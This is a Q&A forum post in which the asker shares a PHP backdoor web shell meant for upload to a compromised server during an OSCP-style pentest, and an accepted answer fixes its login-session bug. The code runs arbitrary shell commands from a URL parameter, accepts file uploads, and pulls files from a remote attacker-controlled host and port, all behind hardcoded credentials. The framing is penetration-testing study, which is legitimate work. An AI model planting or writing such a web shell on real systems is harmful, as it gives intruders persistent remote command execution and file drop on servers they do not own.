# Keep PHP script and html render in one function/view

Tags: php, security

I have a PHP script that I am developing as a backdoor to be uploaded to a compromised server/application in a pentest - As part of a PWK/OSCP. Hence the use of the insecure functions.

I am trying to implement some basic authentication to ensure only the authorised user is able to find and use the backdoor.

The issue that I have is that once the user is logged in, when a command or upload is executed the script goes back into the `login()` function instead of rendering the results of, for example `ls` or any other system command.

I have tried calling `displayForm()` from within itself but I get a memory exception.

How can I change the existing script so that the command output is displayed and the form is ready for the follow up command?

The user:password has been set to 1:1 for the purposes of this debugging as the script does not allow blank passwords.

I am not familiar with PHP so please forgive any glaringly badly written code!

```
<?php
    $_SESSION['valid'] = false;
    login();

    function displayForm() {
        if (!$_SESSION['valid']) {
            login();
        }

        $output = ""; # Leave this blank
        $host = "127.0.0.1"; # host to fetch files from if not a local upload
        $port = "9001"; 

        if (isset($_FILES['fileToUpload'])) {
            $output = "";
            $fileName = basename($_FILES["fileToUpload"]["name"]);
            $file_tmp =$_FILES['fileToUpload']['tmp_name'];
            move_uploaded_file($file_tmp, $fileName);
        }

        if (isset($_POST['remoteFile'])) {
            $output = "";
      file_put_contents($_POST['remoteFile'], file_get_contents("http://$host:$port/" . $_POST['remoteFile']));
    }
    if (isset($_GET['cmd'])) {
      $output .= "<pre>" . shell_exec($_GET['cmd']) . "</pre>";
        }

        echo <<<HTML
            <html>
                <body>
                    <form action="" method="POST" enctype="multipart/form-data">
                        <input type="hidden" name="MAX_FILE_SIZE" value="1000000">
                        <p> Local Upload: <input type="file" name="fileToUpload">
                        <input type="submit" name="upload">
                    </form>

                    <br>

                    <form action="" method="POST" enctype="multipart/form-data">
                        <p> Fetch From Remote: <input type="text" name="remoteFile">
                        <input type="submit" name="fetch">
                    </form>

                    <br>

                    <form method="GET">
                        <p>CMD: <input type="text" name="cmd">
                            <input type="submit" value="Exec">
                    </form>
                        <pre>
                            $output
                        </pre>
            </body>
        </html>
HTML;
}

    function login() {
        $output = "<pre>"  . "Username and password required. Ensure creds have been added to source." . "</pre>";
        $masterUser = "1";
        $masterPassword = "1";

        if (isset($_POST['username']) and isset($_POST['password'])) {
            if ($masterUser === "" or $masterPassword === "") {
                abortProgram();
            }

            if ($_POST['username'] === $masterUser and $_POST['password'] === $masterPassword) {
                $_SESSION['valid'] = true;
        $_SESSION['timeout'] = time();
                displayForm();
            } else {
                $output = "<pre>"  . "Invalid credentials" . "</pre>";
                header("Refresh:0");
            }
        }

        echo <<<HTML
        <html>
                <body>
                <form method="POST">
                     <input type="text" title="username" placeholder="username" name="username"/>
                     <input type="password" title="username" placeholder="password" name="password"/>
                     <button type="submit" class="btn">Login</button>
                </form>
                    <pre>
                        $output
                    </pre>
                </body>
     </html>
HTML;
    }

    function abortProgram() {
        echo <<<HTML
        <html>
                <body>
                    <pre> No password set. Access Denied. Aborting. </pre>
                </body>
     </html>
HTML;
        exit();
    }

    function logout() {
        # logout logic here
    }

?>
```

Answer (score 1, accepted):

So the problem is in the line 2 and 3. When you "login" via your login form you are setting the Session variable and you run `displayForm()` in the same request. But when you submit next form the whole page reloads so the php run whole script from again from top to bottom. The php works only within single request. So that is why you need session. To fix your problem you have to amend the line 2-3 and first check whether the session values are already set. You can do this using simple `if` condition:

```php
<?php
if (!array_key_exists('valid', $_SESSION) || $_SESSION['valid'] !== true) {
  login();
} else {
  displayForm();
}
```